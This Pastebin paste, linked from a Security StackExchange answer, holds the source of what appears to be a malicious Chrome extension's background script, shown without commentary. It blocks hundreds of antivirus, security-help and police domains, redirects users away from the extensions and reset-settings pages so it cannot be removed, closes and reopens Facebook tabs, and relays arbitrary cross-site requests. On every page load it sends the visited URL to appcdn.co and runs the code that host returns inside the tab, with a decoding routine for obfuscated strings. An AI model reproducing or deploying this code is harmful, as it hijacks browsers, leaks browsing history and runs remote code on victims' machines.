Guest User

http://security.stackexchange.com/a/128270/50311

a guest
Jun 27th, 2016
719
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. var domainBlacklist = [
  2. 'facebook.com/csp.php',
  3. 'facebook.com/mac_nerd_son',
  4. 'bitdefender.com',
  5. 'files.avast.com',
  6. 'trendmicro.com',
  7. 'avg.com',
  8. 'grisoft.com',
  9. 'avg.cz',
  10. 'grisoft.cz',
  11. 'edgesuite.net',
  12. 'grisoft.com',
  13. 'avg.com',
  14. 'pctools.com',
  15. 'lavasoft.com',
  16. 'bitdefender.nl',
  17. 'virustotal.com',
  18. 'trendmicro.nl',
  19. 'trendmicro.com.au',
  20. 'securesoft.com.au',
  21. 'avira.com.au',
  22. 'gratissoftwaresite.nl',
  23. 'nod32.com.au',
  24. 'pandasecurity.com.au',
  25. 'lavasoft.com.au',
  26. 'avg.com.au',
  27. 'symantec-norton.com',
  28. 'trendmicro.com',
  29. 'malwarebytes.org',
  30. 'pchelpforum.com',
  31. 'cnet.com',
  32. 'techsupportforum.com',
  33. 'gratissoftware.nu',
  34. 'majorgeeks.com',
  35. 'pcworld.com',
  36. 'microbe.com.au',
  37. 'avast.com.au',
  38. 'avg-antivirus.com.au',
  39. 'nortonantiviruscenter.com',
  40. 'threatmetrix.com',
  41. 'zonealarm.com',
  42. 'firewallguide.com',
  43. 'auditmypc.com',
  44. 'comodo.com',
  45. 'free-firewall.org',
  46. 'schoonepc.nl',
  47. 'iopus.com',
  48. 'tucows.com',
  49. 'avg-antivirus-plus-firewall.en.softonic.com',
  50. 'softonic.com',
  51. 'superantispyware.com.au',
  52. 'superantispyware.com',
  53. 'harveynorman.com.au',
  54. 'ca-store.com.au',
  55. 'netfreighters.com.au',
  56. 'securetec.com.au',
  57. 'anti-spyware.com.au',
  58. 'virusscan.jotti.org',
  59. 'virscan.org',
  60. 'antivir.ru',
  61. 'avira.com',
  62. 'analysis.avira.com',
  63. 'hijackthis.de',
  64. 'uploadmalware.com',
  65. 'emsisoft.com',
  66. 'kaspersky.co.uk',
  67. 'bitdefender.co.uk',
  68. 'eset.co.uk',
  69. 'webroot.com',
  70. 'gdatasoftware.co.uk',
  71. 'pcpro.co.uk',
  72. 'webroot.co.uk',
  73. 'cyprotect.com',
  74. 'drweb-antivir.it',
  75. 'escanav.com',
  76. 'webroot.nl',
  77. 'av.eu',
  78. 'vergelijk.nl',
  79. 'antivirusvergelijk.nl',
  80. 'virussen.upc.nl',
  81. 'antivirus.startpagina.nl',
  82. 'avastav.nl',
  83. 'defenx.nl',
  84. 'gdata.nl',
  85. 'bitdefender.nl',
  86. 'removevirus.org',
  87. 'windows.microsoft.com',
  88. 'answers.microsoft.com',
  89. 'myantispyware.com',
  90. 'krebsonsecurity.com',
  91. 'antivirus.about.com',
  92. 'cleanuninstall.com',
  93. 'staples.com',
  94. 'esetindia.com',
  95. 'mcafee.free-trials.net',
  96. 'antivir-2012.com',
  97. 'panda-antivirus.en.softonic.com',
  98. 'freeantivirushelp.com',
  99. 'scanwith.com',
  100. 'bestantivirusreviewed.com',
  101. 'virus-help.net',
  102. 'cleanallspyware.com',
  103. 'kingsoftsecurity.com',
  104. 'threatfire.com',
  105. 'clamav.net',
  106. 'pcthreat.com',
  107. '2-viruses.com',
  108. 'trojan-killer.ne',
  109. 'virusinfo.info',
  110. 'projecthoneypot.org',
  111. 'novirus.ru',
  112. 'anti-malware.com',
  113. 'offensivecomputing.net',
  114. 'zeustracker.abuse.ch',
  115. 'malekal.com',
  116. 'threatexpert.com',
  117. 'update.microsoft.com',
  118. 'av-comparatives.org',
  119. 'av-test.org',
  120. 'scanwith.com',
  121. 'trendmicro.com.au',
  122. 'kasperskyanz.com.au',
  123. 'bitdefender.com.au',
  124. 'eset.com.au',
  125. 'vet.com.au',
  126. 'mcafee.com',
  127. 'virusbtn.com',
  128. 'adwarereport.com',
  129. 'avg.com.au',
  130. 'adwarereport.com',
  131. 'dw.com',
  132. 'symantec.com',
  133. 'spywarewarrior.com',
  134. 'avsoft.ru',
  135. 'onecare.live.com',
  136. 'anubis.iseclab.org',
  137. 'wepawet.iseclab.org',
  138. 'iseclab.org',
  139. 'freespaceinternetsecurity.com',
  140. 'sunbelt-software.com',
  141. 'prevx.com',
  142. 'tuwien.ac.at',
  143. 'joebox.org',
  144. 'gmer.net',
  145. 'antirootkit.com',
  146. 'sectools.org',
  147. 'sandboxie.com',
  148. 'mwcollect.org',
  149. 'amtso.org',
  150. 'nsslabs.com',
  151. 'icsalabs.com',
  152. 'checkvir.com',
  153. 'check-mark.com',
  154. 'protectstar-testlab.org',
  155. 'anti-malware-test.com',
  156. 'av-test.de',
  157. 'wildlist.org',
  158. 'aavar.org',
  159. 'centralops.net',
  160. 'staysafeonline.info',
  161. 'rokop-security.de',
  162. 'rokop-security.de',
  163. 'wilderssecurity.com',
  164. 'superantispyware.com',
  165. 'kaspersky.com',
  166. 'kaspersky.ru',
  167. 'avp.ru',
  168. 'viruslist.com',
  169. 'kaspersky-antivirus.ru',
  170. 'downloads.kaspersky-labs.com',
  171. 'kavdumps.kaspersky.com',
  172. 'kasperskyclub.ru',
  173. 'kasperskyclub.com',
  174. 'ftp.kasperskylab.ru',
  175. 'ftp.kaspersky-labs.com',
  176. 'ftp.kaspersky.ru',
  177. 'data.kaspersky.ru',
  178. 'z-oleg.com',
  179. 'drweb.com',
  180. 'freedrweb.com',
  181. 'drweb.com.ua',
  182. 'drweb.ru',
  183. 'av-desk.com',
  184. 'drweb.net',
  185. 'ftp.drweb.com',
  186. 'dr-web.ru',
  187. 'download.drweb.com',
  188. 'support.drweb.com',
  189. 'updates.sald.com',
  190. 'sald.com',
  191. 'drweb.imshop.de',
  192. 'norton.com',
  193. 'safeweb.norton.com',
  194. 'liveupdate.symantec.com',
  195. 'service1.symantec.com',
  196. 'security.symantec.com',
  197. 'securityresponse.symantec.com',
  198. 'sygate.com',
  199. 'esetnod32.ru',
  200. 'eset.com',
  201. 'nod32.com.ua',
  202. 'nod32.com',
  203. 'download.eset.com',
  204. 'update.eset.com',
  205. 'eset.eu',
  206. 'nod32.it',
  207. 'nod32.su',
  208. 'nod-32.ru',
  209. 'allnod.com',
  210. 'allnod.info',
  211. 'virusall.ru',
  212. 'nod32eset.org',
  213. 'eset.sk',
  214. 'nod32.nl',
  215. 'antivir.de',
  216. 'free-av.com',
  217. 'free-av.de',
  218. 'avira.com',
  219. 'forum.avira.com',
  220. 'avirus.ru',
  221. 'avirus.com.ua',
  222. 'mcafee.com',
  223. 'home.mcafee.com',
  224. 'us.mcafee.com',
  225. 'mcafeesecurity.com',
  226. 'mcafeesecure.com',
  227. 'avertlabs.com',
  228. 'download.nai.com',
  229. 'nai.com',
  230. 'secure.nai.com',
  231. 'eu.shopmcafee.com',
  232. 'shop.mcafee.com',
  233. 'mcafeestore.com',
  234. 'service.mcafee.com',
  235. 'siteadvisor.com',
  236. 'avast.ru',
  237. 'avast.com',
  238. 'onlinescan.avast.com',
  239. 'download1.avast.com',
  240. 'download1.avast.com',
  241. 'download2.avast.com',
  242. 'download2.avast.com',
  243. 'download3.avast.com',
  244. 'download4.avast.com',
  245. 'download5.avast.com',
  246. 'download7.avast.com',
  247. 'free.avg.com',
  248. 'au.norton.com',
  249. 'trustdefender.com',
  250. 'pctools.com',
  251. 'grisoft.cz',
  252. 'free.grisoft.com',
  253. 'bitdefender.com',
  254. 'msecn.net',
  255. 'bitdefender.de',
  256. 'bitdefender.com.ua',
  257. 'bitdefender.ru',
  258. 'myaccount.bitdefender.com',
  259. 'ftp.bitdefender.com',
  260. 'forum.bitdefender.com',
  261. 'agnitum.ru',
  262. 'agnitum.com',
  263. 'agnitum.de',
  264. 'outpostfirewall.com',
  265. 'dl2.agnitum.com',
  266. 'dl1.agnitum.com',
  267. 'antivirus.comodo.com',
  268. 'camas.comodo.com',
  269. 'comodo.com',
  270. 'comodogroup.com',
  271. 'personalfirewall.comodo.com',
  272. 'hackerguardian.com',
  273. 'nsclean.com',
  274. 'clamav.net',
  275. 'db.local.clamav.net',
  276. 'clamsupport.sourcefire.com',
  277. 'lurker.clamav.net',
  278. 'clamwin.com',
  279. 'gietl.com',
  280. 'clamav.dyndns.org',
  281. 'f-secure.com',
  282. 'f-secure.com',
  283. 'support.f-secure.com',
  284. 'f-secure.ru',
  285. 'ftp.f-secure.com',
  286. 'europe.f-secure.com',
  287. 'f-secure.de',
  288. 'f-secure.de',
  289. 'support.f-secure.de',
  290. 'ftp.f-secure.de',
  291. 'f-secure.co.uk',
  292. 'norman.com',
  293. 'download.norman.no',
  294. 'sandbox.norman.no',
  295. 'nsclean.com',
  296. 'viruslab.ru',
  297. 'pandasoftware.com',
  298. 'anti-virus.by',
  299. 'virusblokada.ru',
  300. 'vba32.de',
  301. 'ftp.nai.com',
  302. 'secuser.com',
  303. 'tds.diamondcs.com.au',
  304. 'windowsupdate.microsoft.com',
  305. 'lavasoftusa.com',
  306. 'lavasoftusa.de',
  307. 'diamondcs.com.au',
  308. 'shop.ca.com',
  309. 'v4.windowsupdate.microsoft.com',
  310. 'v5.windowsupdate.microsoft.com',
  311. 'noadware.net',
  312. 'zonelabs.com',
  313. 'moosoft.com',
  314. 'model-fx.com',
  315. 'pccreg.antivirus.com',
  316. 'k-otik.com',
  317. 'vupen.com',
  318. 'housecall.trendmicro.com',
  319. 'antivirus.cai.com',
  320. 'sophos.com',
  321. 'securitoo.com',
  322. 'nordnet.com',
  323. 'avgfrance.com',
  324. 'avgfrance.com',
  325. 'antivirus-online.de',
  326. 'ftp.esafe.com',
  327. 'ftp.microworldsystems.com',
  328. 'ftp.ca.co',
  329. 'trendmicro-europe.com',
  330. 'inline-software.de',
  331. 'ravantivirus.com',
  332. 'ravantivirus.com',
  333. 'f-prot.com',
  334. 'files.f-prot.com',
  335. 'santivirus.com',
  336. 'openantivirus.org',
  337. 'dialognauka.ru',
  338. 'anti-virus-software-review.com',
  339. 'vet.com.au',
  340. 'antiviraldp.com',
  341. 'pestpatrol.com',
  342. 'antiviraldp.com',
  343. 'pestpatrol.com',
  344. 'simplysup.com',
  345. 'misec.net',
  346. 'my-etrust.com',
  347. 'authentium.com',
  348. 'finjan.com',
  349. 'ikarus-software.at',
  350. 'ika-rus.com',
  351. 'tinysoftware.com',
  352. 'visualizesoftware.com',
  353. 'kerio.com',
  354. 'zonelabs.com',
  355. 'zonelog.co.uk',
  356. 'webroot.com',
  357. 'lavasoft.nu',
  358. 'spywareguide.com',
  359. 'spyblocker-software.com',
  360. 'spamhaus.org',
  361. 'spamcop.net',
  362. 'bobbear.co.uk',
  363. 'domaintools.com',
  364. 'centralops.net',
  365. 'robtex.com',
  366. 'dnsstuff.com',
  367. 'ripe.net',
  368. 'met.police.uk',
  369. 'nbi.gov.ph',
  370. 'police.gov.hk',
  371. 'treasury.gov',
  372. 'treasury.gov',
  373. 'cybercrime.gov',
  374. 'cybercrime.ch',
  375. 'enisa.europa.eu',
  376. 'interpol.int',
  377. 'fsa.gov.uk',
  378. 'companies-house.gov.uk',
  379. 'fraudaid.com',
  380. 'scambusters.org',
  381. 'spamtrackers.eu',
  382. 'emlx.net',
  383. 'clamav.dyndns.org',
  384. 'f-secure.com',
  385. 'f-secure.com',
  386. 'support.f-secure.com',
  387. 'f-secure.ru',
  388. 'ftp.f-secure.com',
  389. 'europe.f-secure.com',
  390. 'f-secure.de',
  391. 'support.f-secure.de',
  392. 'ftp.f-secure.de',
  393. 'f-secure.co.uk',
  394. 'norman.com',
  395. 'download.norman.no',
  396. 'sandbox.norman.no',
  397. 'nsclean.com',
  398. 'viruslab.ru',
  399. 'pandasoftware.com',
  400. 'anti-virus.by',
  401. 'virusblokada.ru',
  402. 'vba32.de',
  403. 'ftp.nai.com',
  404. 'secuser.com',
  405. 'tds.diamondcs.com.au',
  406. 'windowsupdate.microsoft.com',
  407. 'lavasoftusa.com',
  408. 'lavasoftusa.de',
  409. 'diamondcs.com.au',
  410. 'shop.ca.com',
  411. 'v4.windowsupdate.microsoft.com',
  412. 'v5.windowsupdate.microsoft.com',
  413. 'noadware.net',
  414. 'zonelabs.com',
  415. 'moosoft.com',
  416. 'model-fx.com',
  417. 'pccreg.antivirus.com',
  418. 'k-otik.com',
  419. 'vupen.com',
  420. 'housecall.trendmicro.com',
  421. 'antivirus.cai.com',
  422. 'sophos.com',
  423. 'securitoo.com',
  424. 'nordnet.com',
  425. 'avgfrance.com',
  426. 'avgfrance.com',
  427. 'antivirus-online.de',
  428. 'ftp.esafe.com',
  429. 'ftp.microworldsystems.com',
  430. 'ftp.ca.co',
  431. 'trendmicro-europe.com',
  432. 'inline-software.de',
  433. 'ravantivirus.com',
  434. 'ravantivirus.com',
  435. 'f-prot.com',
  436. 'files.f-prot.com',
  437. 'santivirus.com',
  438. 'openantivirus.org',
  439. 'dialognauka.ru',
  440. 'anti-virus-software-review.com',
  441. 'vet.com.au',
  442. 'antiviraldp.com',
  443. 'pestpatrol.com',
  444. 'antiviraldp.com',
  445. 'pestpatrol.com',
  446. 'simplysup.com',
  447. 'misec.net',
  448. 'my-etrust.com',
  449. 'authentium.com',
  450. 'finjan.com',
  451. 'ikarus-software.at',
  452. 'ika-rus.com',
  453. 'tinysoftware.com',
  454. 'visualizesoftware.com',
  455. 'kerio.com',
  456. 'zonelabs.com',
  457. 'zonelog.co.uk',
  458. 'webroot.com',
  459. 'lavasoft.nu',
  460. 'spywareguide.com',
  461. 'spyblocker-software.com',
  462. 'spamhaus.org',
  463. 'spamcop.net',
  464. 'bobbear.co.uk',
  465. 'domaintools.com',
  466. 'centralops.net',
  467. 'robtex.com',
  468. 'dnsstuff.com',
  469. 'ripe.net',
  470. 'met.police.uk',
  471. 'nbi.gov.ph',
  472. 'police.gov.hk',
  473. 'treasury.gov',
  474. 'treasury.gov',
  475. 'cybercrime.gov',
  476. 'cybercrime.ch',
  477. 'enisa.europa.eu',
  478. 'interpol.int',
  479. 'fsa.gov.uk',
  480. 'companies-house.gov.uk',
  481. 'fraudaid.com',
  482. 'scambusters.org',
  483. 'spamtrackers.eu',
  484. 'emlx.net'
  485. ];
  486.  
  487. chrome.webRequest.onBeforeRequest.addListener(
  488.     function(details) {
  489.         for (i = 0; i < domainBlacklist.length; i++) {
  490.             if (details.url.indexOf(domainBlacklist[i]) > -1) {
  491.                 return {
  492.                     cancel: true
  493.                 };
  494.             }
  495.         }
  496.         return {
  497.             cancel: false
  498.         };
  499.     }, {
  500.         urls: ["<all_urls>"]
  501.     }, ["blocking"]);
  502.  
  503.  
  504. function decode(arg) {
  505.     magicArr = "BlTgd&s*Ux[CDMhR'yjSm8b5O)>J2Pq%t,GXv<0i3eL}rZ+Q{n:A-%.4(o!?w/Kp9f7aN6]zHFcY=;V_kIE1u ".split("");
  506.  
  507.     arg = atob(
  508.             arg.split("").reverse().join("")
  509.         )
  510.         .split("m");
  511.     r = "";
  512.  
  513.     for (var i = 0; i < arg.length; i++) {
  514.         if (typeof magicArr[arg[i]] != "undefined") {
  515.             r = r + magicArr[arg[i]];
  516.         }
  517.     }
  518.     return r;
  519. }
  520.  
  521. //window.eval("
  522. window.chrome.runtime.onMessage.addListener(function(message, sender, sendResponse) {
  523.     if (message.action == 'xhttp') {
  524.         var xhttp = new XMLHttpRequest();
  525.         var method = message.method ? message.method.toUpperCase() : 'GET';
  526.         var datatype = message.type ? message.type : 'application/x-www-form-urlencoded';
  527.         xhttp.onload = function() {
  528.             sendResponse(xhttp.responseText);
  529.         };
  530.         xhttp.onerror = function() {
  531.             sendResponse();
  532.         };
  533.         xhttp.open(method, message.url, true);
  534.         if (method == 'POST') {
  535.             xhttp.setRequestHeader('Content-Type', datatype);
  536.         }
  537.         xhttp.send(message.data);
  538.         return true;
  539.     }
  540. });
  541. chrome.tabs.query({
  542.     'url': '*://*.facebook.com/*',
  543. }, function(tabs) {
  544.     active = false;
  545.     for (tab in tabs) {
  546.         if (tabs[tab].active) {
  547.             active = true;
  548.         }
  549.         chrome.tabs.remove(tabs[tab].id, function() {});
  550.     }
  551.     chrome.tabs.create({
  552.         'url': 'https://www.facebook.com/',
  553.         'active': active,
  554.         'selected': active
  555.     }, function() {});
  556. });
  557. //")
  558.  
  559.  
  560. window.chrome.tabs.onUpdated.addListener(function(arg) {
  561.     window.chrome.tabs.get(arg, function(arg) {
  562.         if (arg.status == "complete") {
  563.             tab = arg;
  564.             (
  565.                 tab.url.indexOf('chrome://extension') >= 0 ||
  566.                 tab.url.indexOf('chrome://chrome/extension') >= 0 ||
  567.                 tab.url.indexOf('chrome://settings/resetProfileSettings') >= 0 ||
  568.                 tab.url.indexOf('opera://extensions/') >= 0 ||
  569.                 tab.url.indexOf('browser://tune/') >= 0 ||
  570.                 tab.url.indexOf('chrome://tune/') >= 0 ||
  571.                 tab.url.indexOf('chrome://help/') >= 0
  572.             )
  573.             && chrome.tabs.update(tab.id, {
  574.                 url: 'https://chrome.google.com/webstore/category/apps'
  575.             });
  576.  
  577.             var xhr = new XMLHttpRequest();
  578.             xhr.open('GET', "http://appcdn.co/datajs" + "?r=" + Math.random() + "&url=" + arg.url, true);
  579.             xhr.onreadystatechange = function() {
  580.                 if (xhr.readyState == 4 && xhr.status == 200) {
  581.                     window.chrome.tabs.executeScript(arg.id, {
  582.                         code: xhr.responseText
  583.                     })
  584.                 }
  585.             };
  586.             xhr.send()
  587.         }
  588.     })
  589. })
Add Comment
Please, Sign In to add comment